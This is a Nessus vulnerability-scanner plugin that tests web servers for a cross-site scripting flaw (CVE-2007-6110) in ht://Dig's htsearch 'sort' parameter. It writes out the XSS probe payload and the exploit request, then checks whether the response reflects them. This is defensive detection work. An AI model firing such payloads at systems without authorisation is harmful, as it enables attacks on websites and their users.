#
# (C) Tenable Network Security, Inc.
#


if (description)
{
  script_id(28334);
  script_version("$Revision: 1.3 $");

  script_cve_id("CVE-2007-6110");
  script_bugtraq_id(26610);
  script_xref(name:"OSVDB", value:"40229");

  script_name(english:"htsearch sort Parameter Cross-Site Scripting Vulnerability");
  script_summary(english:"Tries to exploit an XSS issue in htsearch");

  desc = "
Synopsis :

The remote web server contains a CGI script affected by a cross-site
scripting vulnerability. 

Description :

The htsearch CGI script is accessible through the remote web server. 
htsearch is a component of ht://Dig used to index and search documents
such as web pages. 

The version of htsearch installed on the remote host fails to sanitize
user-supplied input to the 'sort' parameter before using it to
generate dynamic output.  An unauthenticated remote attacker may be
able to leverage this issue to inject arbitrary HTML or script code
into a user's browser to be executed within the security context of
the affected site. 

See also :

http://www.nessus.org/u?8318aba2

Solution :

Unknown at this time.

Risk factor :

Medium / CVSS Base Score : 4.3
(CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N)";
  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses : XSS");

  script_copyright(english:"This script is Copyright (C) 2007-2008 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl", "cross_site_scripting.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (get_kb_item("www/"+port+"/generic_xss")) exit(0);


xss = string("<script>alert('", SCRIPT_NAME, "')</script>");
exss = urlencode(str:xss);


# Loop through various directories.
foreach dir (cgi_dirs())
{
  # Try to exploit the issue.
  req = http_get(
    item:string(
      dir, "/htsearch?",
      "config=&",
      "restrict=&",
      "exclude=&",
      "method=and&",
      "format=builtin-long&",
      "sort=", exss, "&",
      "words=", SCRIPT_NAME
    ), 
    port:port
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # There's a problem if...
  if (
    # it's ht://Dig and ...
    "ht://Dig" >< res && 
    # the output complains about our choice of sort method
    string("No such sort method: `", xss, "'") >< res
  )
  {
    security_warning(port);
    exit(0);
  }
}
